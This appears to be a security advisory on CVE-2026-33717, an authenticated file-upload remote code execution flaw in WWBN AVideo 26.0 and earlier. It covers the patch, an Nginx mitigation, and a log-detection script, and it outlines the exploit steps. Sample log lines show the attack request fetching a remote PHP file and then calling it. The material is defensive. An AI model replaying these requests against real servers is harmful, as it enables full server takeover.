Mar 25, 2026
Authenticated attackers can upload and execute arbitrary PHP code by exploiting a logic flaw in the video fetching mechanism of WWBN AVideo <= 26.0.
WWBN AVideo versions up to and including 26.0 are vulnerable to authenticated Remote Code Execution (RCE) via an unrestricted file upload flaw. The vulnerability involves improper error handling during remote video fetching, allowing an attacker to bypass file cleanup routines and persistently store malicious PHP scripts in a web-accessible directory.
WWBN AVideo up to version 26.0 contains a high-severity vulnerability (CVE-2026-33717) allowing authenticated attackers to execute arbitrary code. The flaw resides in the file download functionality utilized by the video encoder module.
The application fetches remote files specified by user-supplied URLs and stores them locally in a web-accessible cache directory. It performs file type validation operations after writing the file to disk rather than before.
A specific error-handling logic flaw allows attackers to force the script to terminate prematurely before the temporary file is deleted. This failure to execute cleanup routines leaves the malicious payload permanently accessible via the web server.
The underlying bug class is CWE-434: Unrestricted Upload of File with Dangerous Type, combined with improper error handling. The vulnerable function downloadVideoFromDownloadURL() within objects/aVideoEncoder.json.php processes user-supplied download URLs.
When a user requests a remote download, the server immediately writes the contents of the remote file into the videos/cache/tmpFile/ directory. The application uses the original filename and extension derived from the URL via the PHP basename() function. No initial validation restricts the file extension during this initial write operation.
Following the file write, the application evaluates the user-supplied resolution parameter. If the parameter contains an invalid string, the application invokes the forbiddenPage() function. This function executes a die() statement, abruptly terminating the PHP process.
Because the script exits prematurely, the execution flow never reaches the cleanup routines responsible for moving or deleting the temporary file. The lack of cleanup renders the downloaded file persistent within the web-accessible directory.
The vulnerable implementation relies entirely on post-download validation. The script downloads the file to the temporary directory and subsequently validates parameters like the video resolution. If validation fails, process termination prevents file cleanup.
The official patch addresses this by reordering the validation logic and implementing an explicit extension allowlist. Input validation now occurs prior to any file I/O operations.
```php
// File: objects/aVideoEncoder.json.php

// 1. Move resolution validation to before the download
if (!empty($_REQUEST['resolution']) && !in_array($_REQUEST['resolution'], $global['avideo_possible_resolutions'])) {
    $msg = "This resolution is not possible {$_REQUEST['resolution']}";
    forbiddenPage($msg); // die() here is now safe because no file is created yet
}

// 2. Validate extension inside download function
function downloadVideoFromDownloadURL($downloadURL) {
    global $global; // added here: the excerpt omits it, but the allowlist check below needs $global in function scope
    // ...
    // Derive the extension from the URL path only, lower-cased, so query strings and case tricks do not influence the check
    $urlExtension = strtolower(pathinfo(parse_url($downloadURL, PHP_URL_PATH), PATHINFO_EXTENSION));
    if (!in_array($urlExtension, $global['allowedExtension'])) {
        __errlog("Extension not allowed: " . $urlExtension);
        return false; // nothing has been written to disk at this point
    }
    // ... proceed to download
}
```

The in_array($urlExtension, $global['allowedExtension']) check ensures that only explicitly permitted file types are ever written to disk, which removes the CWE-434 vector regardless of what happens to the request afterwards.
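To make the ordering problem concrete, the following is an added Python model of the two code paths described above; it is not AVideo code (which is PHP) and not the project's patch. The remote fetch is replaced by a constructed in-memory table so it runs offline, and the resolution and extension allowlists are assumptions standing in for AVideo's own $global values. It goes slightly beyond the page's fix: besides validating before any I/O, the hardened variant lets the server choose the on-disk name and releases the temporary file in a finally block, so no abort path can leave it behind.

```python
"""Write-then-validate (vulnerable ordering) versus validate-then-write.

Added example, not AVideo code. The "remote" fetch reads from a constructed
dictionary; no network access happens.
"""
import os
import shutil
import tempfile
from typing import List, Tuple
from urllib.parse import urlparse

# Assumed allowlists (AVideo keeps its own in $global; values are not on the page).
ALLOWED_EXTENSIONS = {"mp4", "webm", "mkv", "mov", "mp3"}
POSSIBLE_RESOLUTIONS = {"240", "360", "480", "720", "1080"}

# Constructed stand-in for the remote host.
FAKE_REMOTE = {
    "https://media.example/clip.mp4": b"\x00\x00\x00\x18ftypmp42 constructed video bytes",
    "https://203.0.113.9/x.php": b"<?php /* constructed stand-in, never executed */ ?>",
}


class ValidationError(Exception):
    """Raised where the original code would call forbiddenPage() and die()."""


def _fetch(url: str) -> bytes:
    return FAKE_REMOTE[url]


def _name_from_url(url: str) -> str:
    # Mirrors basename() on the URL path: the requester controls name and extension.
    return os.path.basename(urlparse(url).path)


def fetch_write_then_validate(url: str, resolution: str, cache_dir: str) -> str:
    """Vulnerable ordering: the file is on disk before any parameter is checked.

    A failed check raises (the analogue of die()), so the move/cleanup at the
    end never runs and the fetched file stays in the web-accessible cache.
    """
    tmp = os.path.join(cache_dir, _name_from_url(url))
    with open(tmp, "wb") as fh:
        fh.write(_fetch(url))                                   # 1. write first
    if resolution not in POSSIBLE_RESOLUTIONS:
        raise ValidationError(f"This resolution is not possible {resolution}")  # 2. abort
    final = tmp + ".ok"
    os.replace(tmp, final)                                       # 3. never reached on abort
    return final


def fetch_validate_then_write(url: str, resolution: str, cache_dir: str) -> str:
    """Hardened ordering: every request-derived value is checked before I/O,
    and the temporary file is removed in a finally block."""
    if resolution not in POSSIBLE_RESOLUTIONS:
        raise ValidationError(f"This resolution is not possible {resolution}")
    ext = os.path.splitext(urlparse(url).path)[1].lstrip(".").lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValidationError(f"Extension not allowed: {ext}")
    # Server-chosen name: the requester no longer picks the on-disk filename.
    fd, tmp = tempfile.mkstemp(suffix=f".{ext}.part", dir=cache_dir)
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(_fetch(url))
        final = tmp[: -len(".part")]
        os.replace(tmp, final)
        return final
    finally:
        if os.path.exists(tmp):          # only true if something failed before the move
            os.remove(tmp)


def leftover_files(cache_dir: str) -> List[str]:
    return sorted(os.listdir(cache_dir))


def run_scenario(handler, url: str, resolution: str) -> Tuple[str, List[str]]:
    """Run one handler in a fresh cache dir; report the outcome and what stayed behind."""
    cache_dir = tempfile.mkdtemp(prefix="tmpFile-")
    try:
        try:
            handler(url, resolution, cache_dir)
            status = "ok"
        except ValidationError:
            status = "rejected"
        return status, leftover_files(cache_dir)
    finally:
        shutil.rmtree(cache_dir)


if __name__ == "__main__":
    for handler in (fetch_write_then_validate, fetch_validate_then_write):
        print(handler.__name__, run_scenario(handler, "https://203.0.113.9/x.php", "zzz"))
```

The vulnerable variant reports ("rejected", ["x.php"]): the request was refused, yet the PHP file remains in the cache directory. The hardened variant reports ("rejected", []) for the same input. One caveat when carrying this pattern back to PHP: exit() and die() do not run finally blocks, so in PHP the guarantee has to come from validating before any write (as the patch does) or from cleanup registered with register_shutdown_function(), not from try/finally alone.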
Exploitation requires a user account with minimal privileges, specifically standard user or encoder permissions. The attacker needs secondary server infrastructure to host the initial payload.
The attacker hosts a malicious PHP script on their controlled infrastructure. They then transmit a direct request to the objects/aVideoEncoder.json.php endpoint on the target AVideo server.
The request must contain two specific parameters: a downloadURL pointing to the malicious PHP script and a resolution parameter containing an explicitly invalid value. The target server fetches the PHP file and writes it to the videos/cache/tmpFile/ directory.
The invalid resolution parameter forces the application to evaluate the input and call forbiddenPage(). The script aborts, leaving the PHP file in the temporary directory. The attacker subsequently accesses the file via a predictable URL path to achieve code execution.
Successful exploitation yields arbitrary remote code execution within the context of the web server service account. This grants the attacker comprehensive control over the application environment and direct filesystem access.
The attacker gains read and write access to the application database credentials, configuration files, and stored media. This constitutes a complete loss of confidentiality and integrity according to the CVSS v3.1 scoring framework.
The vulnerability carries a CVSS v3.1 base score of 8.8. The attack complexity is low, and no user interaction is required. The requirement for low-privilege authentication (PR:L) is what keeps this vulnerability below the 9.8 critical rating.
Organizations operating WWBN AVideo must upgrade to version 26.1 or later. The patch completely eliminates the vulnerability by validating input before allocating storage and strictly limiting allowed file extensions.
If immediate patching is not technically feasible, administrators can apply mitigation controls at the web server layer. Configuring Nginx or Apache to deny execution of PHP scripts within the /videos/cache/ directory structure neutralizes the exploit.
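The following is an added Nginx fragment illustrating that web-server-layer control; it is not configuration shipped by the AVideo project. It assumes AVideo is served from the site root of this server block and that PHP is handed to php-fpm by a later generic "\.php$" location; if AVideo lives under a URL prefix, prepend that prefix to the path pattern.

```nginx
# Deny execution of anything PHP-like under the cache tree.
# Regex locations are evaluated in the order they appear and the first
# match wins, so this block must sit BEFORE the php-fpm handler location.
location ~* ^/videos/cache/.*\.(php|phtml|phar|php[0-9])$ {
    return 403;
}

# ... existing php-fpm handler follows, e.g.
# location ~ \.php$ {
#     fastcgi_pass unix:/run/php/php-fpm.sock;
#     ...
# }
```

Reload Nginx after the change and confirm the control works by requesting a harmless test file you placed under videos/cache/ with a .php name: the expected response is 403 rather than PHP output. The same effect on Apache with mod_php is php_admin_flag engine off inside a Directory block for the cache path; with php-fpm behind Apache, a FilesMatch block that denies .php requests in that directory serves the same purpose.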
Administrators should monitor web server access logs for anomalous requests to objects/aVideoEncoder.json.php. Requests featuring unusual or malformed resolution parameters alongside remote downloadURL inputs strongly indicate exploitation attempts.
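As an added example of the monitoring described above (not part of the advisory or of AVideo), the script below scans combined-format access log lines for two indicators drawn from this page: a request to objects/aVideoEncoder.json.php carrying a remote downloadURL together with a resolution value outside the allowlist or a PHP-named download target, and any request for a PHP file under /videos/cache/. The log lines are constructed samples, and the resolution allowlist is an assumption standing in for AVideo's $global['avideo_possible_resolutions'].

```python
"""Flag access-log lines matching the CVE-2026-33717 abuse pattern.

Added example, not AVideo code. Parses the combined log format and applies
two checks taken from the advisory text:
  A. encoder endpoint + remote downloadURL + (bad resolution or PHP-named file)
  B. a PHP file requested from under /videos/cache/
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlparse

# Assumed allowlist; AVideo's real list is $global['avideo_possible_resolutions'].
POSSIBLE_RESOLUTIONS = {"240", "360", "480", "720", "1080"}
PHP_EXT = re.compile(r"\.(php|phtml|phar|php\d)$", re.I)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [25/Mar/2026:10:15:32 +0000] "GET /objects/aVideoEncoder.json.php?downloadURL=https%3A%2F%2F198.51.100.7%2Fx.php&resolution=zzz HTTP/1.1" 403 512 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Mar/2026:10:15:40 +0000] "GET /videos/cache/tmpFile/x.php HTTP/1.1" 200 87 "-" "curl/8.4.0"
198.51.100.20 - - [25/Mar/2026:10:20:01 +0000] "GET /objects/aVideoEncoder.json.php?downloadURL=https%3A%2F%2Fmedia.example%2Fclip.mp4&resolution=720 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.20 - - [25/Mar/2026:10:21:11 +0000] "GET /videos/cache/tmpFile/clip.mp4 HTTP/1.1" 200 90210 "-" "Mozilla/5.0"
"""


def classify(line: str) -> Optional[str]:
    """Return a finding label for a suspicious line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlparse(m.group("target"))
    path = target.path
    qs = parse_qs(target.query)

    # Check B: a PHP file fetched from the cache tree.
    if path.startswith("/videos/cache/") and PHP_EXT.search(path):
        return "php-under-videos-cache"

    # Check A: encoder endpoint with a remote download and suspicious parameters.
    if path.endswith("/objects/aVideoEncoder.json.php"):
        dl = urlparse(qs.get("downloadURL", [""])[0])
        res = qs.get("resolution", [""])[0]
        remote = dl.scheme in ("http", "https")
        bad_res = bool(res) and res not in POSSIBLE_RESOLUTIONS
        php_dl = bool(PHP_EXT.search(dl.path))
        if remote and (bad_res or php_dl):
            return "encoder-remote-download-bad-params"
    return None


def scan(log_text: str) -> List[Tuple[str, str]]:
    """(source ip, finding) for every flagged line, in log order."""
    findings = []
    for line in log_text.splitlines():
        label = classify(line)
        if label:
            findings.append((line.split(" ", 1)[0], label))
    return findings


if __name__ == "__main__":
    for ip, label in scan(SAMPLE_LOG):
        print(ip, label)
```

Run against the samples, the first two lines are flagged and the two legitimate media requests are not. One limitation to keep in mind: the combined format records only the request line, and the endpoint reads parameters through $_REQUEST, so a request that sends downloadURL and resolution in a POST body shows up with an empty query string and check A sees nothing. Check B still catches the follow-up fetch of the stored file, and for the upload itself you need application-level logging or a proxy that records request bodies.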
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

| Product | Affected Versions | Fixed Version |
|---|---|---|
| AVideo WWBN | <= 26.0 | 26.1 |

| Attribute | Detail |
|---|---|
| CWE ID | CWE-434: Unrestricted Upload of File with Dangerous Type |
| Attack Vector | Network |
| CVSS v3.1 | 8.8 |
| EPSS | 0.04% |
| Impact | High (RCE) |
| Exploit Status | Weaponized |
| KEV Status | Not Listed |